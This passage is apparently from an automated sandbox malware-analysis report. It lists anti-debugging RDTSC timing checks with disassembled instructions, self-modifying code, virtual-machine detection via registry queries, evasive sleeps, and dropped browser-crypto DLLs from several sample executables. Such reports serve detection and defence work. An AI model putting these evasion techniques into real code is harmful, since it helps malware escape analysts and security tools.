Source: C:\Users\user\DocumentsHCFBFBAEBK.exe	RDTSC instruction interceptor: First address: A57334 second address: A57338 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\DocumentsHCFBFBAEBK.exe	RDTSC instruction interceptor: First address: A57338 second address: A5735C instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F528074EBD6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F528074EBE6h 0x00000013 rdtsc
Source: C:\Users\user\DocumentsHCFBFBAEBK.exe	RDTSC instruction interceptor: First address: A5735C second address: A573CD instructions: 0x00000000 rdtsc 0x00000002 jo 00007F528105F328h 0x00000008 push esi 0x00000009 pop esi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c nop 0x0000000d push 00000000h 0x0000000f push ecx 0x00000010 call 00007F528105F328h 0x00000015 pop ecx 0x00000016 mov dword ptr [esp+04h], ecx 0x0000001a add dword ptr [esp+04h], 0000001Ch 0x00000022 inc ecx 0x00000023 push ecx 0x00000024 ret 0x00000025 pop ecx 0x00000026 ret 0x00000027 sub dword ptr [ebp+122D2525h], ebx 0x0000002d push 00000000h 0x0000002f sub edi, 333BFDB1h 0x00000035 push 00000000h 0x00000037 push 00000000h 0x00000039 push edi 0x0000003a call 00007F528105F328h 0x0000003f pop edi 0x00000040 mov dword ptr [esp+04h], edi 0x00000044 add dword ptr [esp+04h], 00000018h 0x0000004c inc edi 0x0000004d push edi 0x0000004e ret 0x0000004f pop edi 0x00000050 ret 0x00000051 cld 0x00000052 push eax 0x00000053 push eax 0x00000054 push edx 0x00000055 jmp 00007F528105F32Ch 0x0000005a rdtsc
Source: C:\Users\user\DocumentsHCFBFBAEBK.exe	RDTSC instruction interceptor: First address: A5ACC3 second address: A5AD48 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 jmp 00007F528074EBDBh 0x00000008 pop edx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov dword ptr [esp], eax 0x0000000e push 00000000h 0x00000010 push esi 0x00000011 call 00007F528074EBD8h 0x00000016 pop esi 0x00000017 mov dword ptr [esp+04h], esi 0x0000001b add dword ptr [esp+04h], 00000015h 0x00000023 inc esi 0x00000024 push esi 0x00000025 ret 0x00000026 pop esi 0x00000027 ret 0x00000028 mov edi, ebx 0x0000002a sub dword ptr [ebp+122D33A4h], ebx 0x00000030 push 00000000h 0x00000032 push 00000000h 0x00000034 push edx 0x00000035 call 00007F528074EBD8h 0x0000003a pop edx 0x0000003b mov dword ptr [esp+04h], edx 0x0000003f add dword ptr [esp+04h], 00000015h 0x00000047 inc edx 0x00000048 push edx 0x00000049 ret 0x0000004a pop edx 0x0000004b ret 0x0000004c jno 00007F528074EBD6h 0x00000052 push 00000000h 0x00000054 jmp 00007F528074EBE8h 0x00000059 xchg eax, ebx 0x0000005a push eax 0x0000005b push edx 0x0000005c pushad 0x0000005d push esi 0x0000005e pop esi 0x0000005f ja 00007F528074EBD6h 0x00000065 popad 0x00000066 rdtsc
Source: C:\Users\user\DocumentsHCFBFBAEBK.exe	RDTSC instruction interceptor: First address: A5AD48 second address: A5AD6E instructions: 0x00000000 rdtsc 0x00000002 jno 00007F528105F33Ch 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push esi 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\DocumentsHCFBFBAEBK.exe	RDTSC instruction interceptor: First address: A5AD6E second address: A5AD72 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\DocumentsHCFBFBAEBK.exe	RDTSC instruction interceptor: First address: A5C2AE second address: A5C2C0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F528105F32Dh 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\DocumentsHCFBFBAEBK.exe	RDTSC instruction interceptor: First address: A5E058 second address: A5E077 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push ecx 0x00000004 pop ecx 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 pushad 0x0000000a jmp 00007F528074EBE3h 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\DocumentsHCFBFBAEBK.exe	RDTSC instruction interceptor: First address: A584F8 second address: A584FD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
Source: C:\Users\user\DocumentsHCFBFBAEBK.exe	RDTSC instruction interceptor: First address: A584FD second address: A58504 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edx 0x00000004 pop edx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\DocumentsHCFBFBAEBK.exe	RDTSC instruction interceptor: First address: A58504 second address: A5851D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push ecx 0x0000000b jmp 00007F528105F32Dh 0x00000010 pop ecx 0x00000011 rdtsc
Source: C:\Users\user\DocumentsHCFBFBAEBK.exe	RDTSC instruction interceptor: First address: A60B0A second address: A60B0E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\DocumentsHCFBFBAEBK.exe	RDTSC instruction interceptor: First address: A60B0E second address: A60B80 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 jns 00007F528105F334h 0x0000000d pushad 0x0000000e pushad 0x0000000f popad 0x00000010 jmp 00007F528105F32Ah 0x00000015 popad 0x00000016 nop 0x00000017 push ecx 0x00000018 mov dword ptr [ebp+122D1CD5h], esi 0x0000001e pop ebx 0x0000001f jmp 00007F528105F32Eh 0x00000024 push 00000000h 0x00000026 push 00000000h 0x00000028 push edi 0x00000029 call 00007F528105F328h 0x0000002e pop edi 0x0000002f mov dword ptr [esp+04h], edi 0x00000033 add dword ptr [esp+04h], 0000001Dh 0x0000003b inc edi 0x0000003c push edi 0x0000003d ret 0x0000003e pop edi 0x0000003f ret 0x00000040 and ebx, 3286BB64h 0x00000046 push 00000000h 0x00000048 mov di, 4CA4h 0x0000004c xchg eax, esi 0x0000004d push eax 0x0000004e push edx 0x0000004f pushad 0x00000050 push edi 0x00000051 pop edi 0x00000052 je 00007F528105F326h 0x00000058 popad 0x00000059 rdtsc
Source: C:\Users\user\DocumentsHCFBFBAEBK.exe	RDTSC instruction interceptor: First address: A60B80 second address: A60B95 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push ecx 0x00000006 pop ecx 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jbe 00007F528074EBDCh 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\DocumentsHCFBFBAEBK.exe	RDTSC instruction interceptor: First address: A60B95 second address: A60B99 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\DocumentsHCFBFBAEBK.exe	RDTSC instruction interceptor: First address: A60B99 second address: A60B9F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\DocumentsHCFBFBAEBK.exe	RDTSC instruction interceptor: First address: A60B9F second address: A60BA3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\DocumentsHCFBFBAEBK.exe	RDTSC instruction interceptor: First address: A60BA3 second address: A60BA7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\DocumentsHCFBFBAEBK.exe	RDTSC instruction interceptor: First address: A61B46 second address: A61BC0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F528105F32Eh 0x00000008 js 00007F528105F326h 0x0000000e popad 0x0000000f pop edx 0x00000010 pop eax 0x00000011 mov dword ptr [esp], eax 0x00000014 push 00000000h 0x00000016 push ebp 0x00000017 call 00007F528105F328h 0x0000001c pop ebp 0x0000001d mov dword ptr [esp+04h], ebp 0x00000021 add dword ptr [esp+04h], 0000001Ah 0x00000029 inc ebp 0x0000002a push ebp 0x0000002b ret 0x0000002c pop ebp 0x0000002d ret 0x0000002e push 00000000h 0x00000030 push 00000000h 0x00000032 push edx 0x00000033 call 00007F528105F328h 0x00000038 pop edx 0x00000039 mov dword ptr [esp+04h], edx 0x0000003d add dword ptr [esp+04h], 00000014h 0x00000045 inc edx 0x00000046 push edx 0x00000047 ret 0x00000048 pop edx 0x00000049 ret 0x0000004a add dword ptr [ebp+122D36A2h], ecx 0x00000050 push 00000000h 0x00000052 cmc 0x00000053 mov ebx, ecx 0x00000055 xchg eax, esi 0x00000056 jmp 00007F528105F32Ah 0x0000005b push eax 0x0000005c push eax 0x0000005d push edx 0x0000005e push eax 0x0000005f push edx 0x00000060 push edi 0x00000061 pop edi 0x00000062 rdtsc
Source: C:\Users\user\DocumentsHCFBFBAEBK.exe	RDTSC instruction interceptor: First address: A61BC0 second address: A61BC6 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\DocumentsHCFBFBAEBK.exe	RDTSC instruction interceptor: First address: A61BC6 second address: A61BD9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F528105F32Fh 0x00000009 rdtsc
Source: C:\Users\user\DocumentsHCFBFBAEBK.exe	RDTSC instruction interceptor: First address: A62B24 second address: A62B28 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\DocumentsHCFBFBAEBK.exe	RDTSC instruction interceptor: First address: A62B28 second address: A62B34 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push edi 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\DocumentsHCFBFBAEBK.exe	RDTSC instruction interceptor: First address: A62B34 second address: A62BAA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 pop edi 0x00000006 nop 0x00000007 push 00000000h 0x00000009 push ebp 0x0000000a call 00007F528074EBD8h 0x0000000f pop ebp 0x00000010 mov dword ptr [esp+04h], ebp 0x00000014 add dword ptr [esp+04h], 0000001Bh 0x0000001c inc ebp 0x0000001d push ebp 0x0000001e ret 0x0000001f pop ebp 0x00000020 ret 0x00000021 push 00000000h 0x00000023 push 00000000h 0x00000025 push ecx 0x00000026 call 00007F528074EBD8h 0x0000002b pop ecx 0x0000002c mov dword ptr [esp+04h], ecx 0x00000030 add dword ptr [esp+04h], 00000019h 0x00000038 inc ecx 0x00000039 push ecx 0x0000003a ret 0x0000003b pop ecx 0x0000003c ret 0x0000003d push edx 0x0000003e mov dword ptr [ebp+124678EEh], edx 0x00000044 pop ebx 0x00000045 mov edi, dword ptr [ebp+122D3528h] 0x0000004b push 00000000h 0x0000004d jnp 00007F528074EBDAh 0x00000053 mov bx, 916Ah 0x00000057 push eax 0x00000058 pushad 0x00000059 push ecx 0x0000005a jnl 00007F528074EBD6h 0x00000060 pop ecx 0x00000061 pushad 0x00000062 pushad 0x00000063 popad 0x00000064 push eax 0x00000065 push edx 0x00000066 rdtsc
Source: C:\Users\user\DocumentsHCFBFBAEBK.exe	RDTSC instruction interceptor: First address: A63B38 second address: A63B4E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pushad 0x00000004 popad 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 pushad 0x0000000a jnp 00007F528105F328h 0x00000010 push eax 0x00000011 push edx 0x00000012 push esi 0x00000013 pop esi 0x00000014 rdtsc
Source: C:\Users\user\DocumentsHCFBFBAEBK.exe	RDTSC instruction interceptor: First address: A64C9A second address: A64CA4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a rdtsc
Source: C:\Users\user\DocumentsHCFBFBAEBK.exe	RDTSC instruction interceptor: First address: A65CCA second address: A65CD0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\DocumentsHCFBFBAEBK.exe	RDTSC instruction interceptor: First address: A65CD0 second address: A65D75 instructions: 0x00000000 rdtsc 0x00000002 je 00007F528074EBD6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c nop 0x0000000d push 00000000h 0x0000000f push ebp 0x00000010 call 00007F528074EBD8h 0x00000015 pop ebp 0x00000016 mov dword ptr [esp+04h], ebp 0x0000001a add dword ptr [esp+04h], 0000001Dh 0x00000022 inc ebp 0x00000023 push ebp 0x00000024 ret 0x00000025 pop ebp 0x00000026 ret 0x00000027 call 00007F528074EBDCh 0x0000002c sub edi, dword ptr [ebp+122D3B74h] 0x00000032 pop edi 0x00000033 push 00000000h 0x00000035 pushad 0x00000036 and ecx, dword ptr [ebp+122D21EEh] 0x0000003c jmp 00007F528074EBE2h 0x00000041 popad 0x00000042 push 00000000h 0x00000044 push 00000000h 0x00000046 push ebx 0x00000047 call 00007F528074EBD8h 0x0000004c pop ebx 0x0000004d mov dword ptr [esp+04h], ebx 0x00000051 add dword ptr [esp+04h], 0000001Dh 0x00000059 inc ebx 0x0000005a push ebx 0x0000005b ret 0x0000005c pop ebx 0x0000005d ret 0x0000005e sub ebx, 79155900h 0x00000064 jg 00007F528074EBDCh 0x0000006a adc ebx, 056129ADh 0x00000070 xchg eax, esi 0x00000071 push eax 0x00000072 push edx 0x00000073 push eax 0x00000074 push edx 0x00000075 jnc 00007F528074EBD6h 0x0000007b rdtsc
Source: C:\Users\user\DocumentsHCFBFBAEBK.exe	RDTSC instruction interceptor: First address: A65D75 second address: A65D7F instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F528105F326h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\DocumentsHCFBFBAEBK.exe	RDTSC instruction interceptor: First address: A66E5B second address: A66E5F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\DocumentsHCFBFBAEBK.exe	RDTSC instruction interceptor: First address: A66E5F second address: A66E95 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F528105F338h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edi 0x0000000a push eax 0x0000000b pushad 0x0000000c jmp 00007F528105F333h 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\DocumentsHCFBFBAEBK.exe	RDTSC instruction interceptor: First address: A66E95 second address: A66E99 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\DocumentsHCFBFBAEBK.exe	RDTSC instruction interceptor: First address: A67F59 second address: A67F60 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\DocumentsHCFBFBAEBK.exe	RDTSC instruction interceptor: First address: A6AE24 second address: A6AEAC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 popad 0x00000007 je 00007F528074EBDCh 0x0000000d jne 00007F528074EBD6h 0x00000013 popad 0x00000014 push eax 0x00000015 jns 00007F528074EBE8h 0x0000001b nop 0x0000001c push 00000000h 0x0000001e push edi 0x0000001f call 00007F528074EBD8h 0x00000024 pop edi 0x00000025 mov dword ptr [esp+04h], edi 0x00000029 add dword ptr [esp+04h], 0000001Ah 0x00000031 inc edi 0x00000032 push edi 0x00000033 ret 0x00000034 pop edi 0x00000035 ret 0x00000036 push 00000000h 0x00000038 push 00000000h 0x0000003a push ebp 0x0000003b call 00007F528074EBD8h 0x00000040 pop ebp 0x00000041 mov dword ptr [esp+04h], ebp 0x00000045 add dword ptr [esp+04h], 0000001Bh 0x0000004d inc ebp 0x0000004e push ebp 0x0000004f ret 0x00000050 pop ebp 0x00000051 ret 0x00000052 mov edi, dword ptr [ebp+122D1D62h] 0x00000058 push 00000000h 0x0000005a push eax 0x0000005b push eax 0x0000005c push edx 0x0000005d jno 00007F528074EBD8h 0x00000063 rdtsc
Source: C:\Users\user\DocumentsHCFBFBAEBK.exe	RDTSC instruction interceptor: First address: A6CDC7 second address: A6CDCD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\DocumentsHCFBFBAEBK.exe	RDTSC instruction interceptor: First address: A6CDCD second address: A6CDD1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\DocumentsHCFBFBAEBK.exe	RDTSC instruction interceptor: First address: A6EE6A second address: A6EE6F instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\DocumentsHCFBFBAEBK.exe	RDTSC instruction interceptor: First address: A6EF16 second address: A6EF1A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\DocumentsHCFBFBAEBK.exe	RDTSC instruction interceptor: First address: A6FF96 second address: A6FFA0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 push eax 0x00000006 push edx 0x00000007 push ebx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\DocumentsHCFBFBAEBK.exe	RDTSC instruction interceptor: First address: A5A067 second address: A5A06D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\DocumentsHCFBFBAEBK.exe	RDTSC instruction interceptor: First address: A7328E second address: A73292 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\DocumentsHCFBFBAEBK.exe	RDTSC instruction interceptor: First address: A73292 second address: A7329E instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 jns 00007F528074EBD6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\DocumentsHCFBFBAEBK.exe	RDTSC instruction interceptor: First address: A5AA7C second address: A5AA8E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 push edx 0x0000000a pop edx 0x0000000b jnc 00007F528105F326h 0x00000011 popad 0x00000012 rdtsc

Tries to evade debugger and weak emulator (self modifying code)

Source: C:\Users\user\Desktop\file.exe	Special instruction interceptor: First address: F7FC33 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe	Special instruction interceptor: First address: 1124AAE instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe	Special instruction interceptor: First address: 112358F instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe	Special instruction interceptor: First address: F7D61E instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe	Special instruction interceptor: First address: F7FB98 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe	Special instruction interceptor: First address: 1137ECC instructions caused by: Self-modifying code
Source: C:\Users\user\DocumentsHCFBFBAEBK.exe	Special instruction interceptor: First address: A4D6AB instructions caused by: Self-modifying code
Source: C:\Users\user\DocumentsHCFBFBAEBK.exe	Special instruction interceptor: First address: 8AEC2C instructions caused by: Self-modifying code
Source: C:\Users\user\DocumentsHCFBFBAEBK.exe	Special instruction interceptor: First address: AD2DFB instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Special instruction interceptor: First address: 36D6AB instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Special instruction interceptor: First address: 1CEC2C instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Special instruction interceptor: First address: 3F2DFB instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1005695001\6fc7e371fe.exe	Special instruction interceptor: First address: ECFC33 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1005695001\6fc7e371fe.exe	Special instruction interceptor: First address: 1074AAE instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1005695001\6fc7e371fe.exe	Special instruction interceptor: First address: 107358F instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1005695001\6fc7e371fe.exe	Special instruction interceptor: First address: ECD61E instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1005695001\6fc7e371fe.exe	Special instruction interceptor: First address: ECFB98 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1005695001\6fc7e371fe.exe	Special instruction interceptor: First address: 1087ECC instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1005697001\a0969106aa.exe	Special instruction interceptor: First address: D4DEBF instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1005697001\a0969106aa.exe	Special instruction interceptor: First address: D4DFCD instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1005697001\a0969106aa.exe	Special instruction interceptor: First address: EFA734 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1005697001\a0969106aa.exe	Special instruction interceptor: First address: F26EEA instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1005697001\a0969106aa.exe	Special instruction interceptor: First address: F93CBB instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1005697001\a0969106aa.exe	Special instruction interceptor: First address: D52E95 instructions caused by: Self-modifying code

Allocates memory with a write watch (potentially for evading sandboxes)

Source: C:\Users\user\AppData\Local\Temp\1005697001\a0969106aa.exe	Memory allocated: 4900000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\Temp\1005697001\a0969106aa.exe	Memory allocated: 4AE0000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\Temp\1005697001\a0969106aa.exe	Memory allocated: 6AE0000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\Temp\1005697001\a0969106aa.exe	Memory allocated: 5360000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\Temp\1005697001\a0969106aa.exe	Memory allocated: 56B0000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\Temp\1005697001\a0969106aa.exe	Memory allocated: 55F0000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\Temp\1005697001\a0969106aa.exe	Memory allocated: 5560000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\Temp\1005697001\a0969106aa.exe	Memory allocated: 5760000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\Temp\1005697001\a0969106aa.exe	Memory allocated: 5560000 memory reserve \| memory write watch

Contains capabilities to detect virtual machines

Source: C:\Users\user\AppData\Local\Temp\1005697001\a0969106aa.exe	Registry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc
Source: C:\Users\user\AppData\Local\Temp\1005697001\a0969106aa.exe	Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion
Source: C:\Users\user\AppData\Local\Temp\1005697001\a0969106aa.exe	Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion

Contains functionality for execution timing, often used to detect debuggers

Source: C:\Users\user\DocumentsHCFBFBAEBK.exe

Code function: 21_2_04A10D28 rdtsc

21_2_04A10D28

Contains long sleeps (>= 3 min)

Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Thread delayed: delay time: 180000
Source: C:\Users\user\AppData\Local\Temp\1005697001\a0969106aa.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\1005697001\a0969106aa.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\1005697001\a0969106aa.exe	Thread delayed: delay time: 922337203685477

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Window / User API: threadDelayed 430

Found dropped PE file which has not been started or loaded

Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\vcruntime140[1].dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\ProgramData\nss3.dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\nss3[1].dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\freebl3[1].dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\msvcp140[1].dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\ProgramData\freebl3.dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\softokn3[1].dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\mozglue[1].dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\ProgramData\softokn3.dll	Jump to dropped file

Found large amount of non-executed APIs

Source: C:\Users\user\Desktop\file.exe

API coverage: 0.3 %

May sleep (evasive loops) to hinder dynamic analysis

Source: C:\Users\user\Desktop\file.exe TID: 6128	Thread sleep time: -36018s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\file.exe TID: 6188	Thread sleep count: 31 > 30	Jump to behavior
Source: C:\Users\user\Desktop\file.exe TID: 6188	Thread sleep time: -62031s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\file.exe TID: 6656	Thread sleep time: -48024s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\file.exe TID: 1352	Thread sleep time: -48024s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\file.exe TID: 6604	Thread sleep time: -42021s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\file.exe TID: 5908	Thread sleep time: -48024s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 2968	Thread sleep count: 67 > 30
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 2968	Thread sleep time: -134067s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 6036	Thread sleep count: 54 > 30
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 6036	Thread sleep time: -108054s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 8164	Thread sleep count: 430 > 30
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 8164	Thread sleep time: -12900000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 6984	Thread sleep count: 57 > 30
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 6984	Thread sleep time: -114057s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 5796	Thread sleep count: 42 > 30
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 5796	Thread sleep time: -84042s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 4672	Thread sleep count: 69 > 30
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 4672	Thread sleep time: -138069s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 7392	Thread sleep count: 68 > 30
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 7392	Thread sleep time: -136068s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 8280	Thread sleep time: -180000s >= -30000s
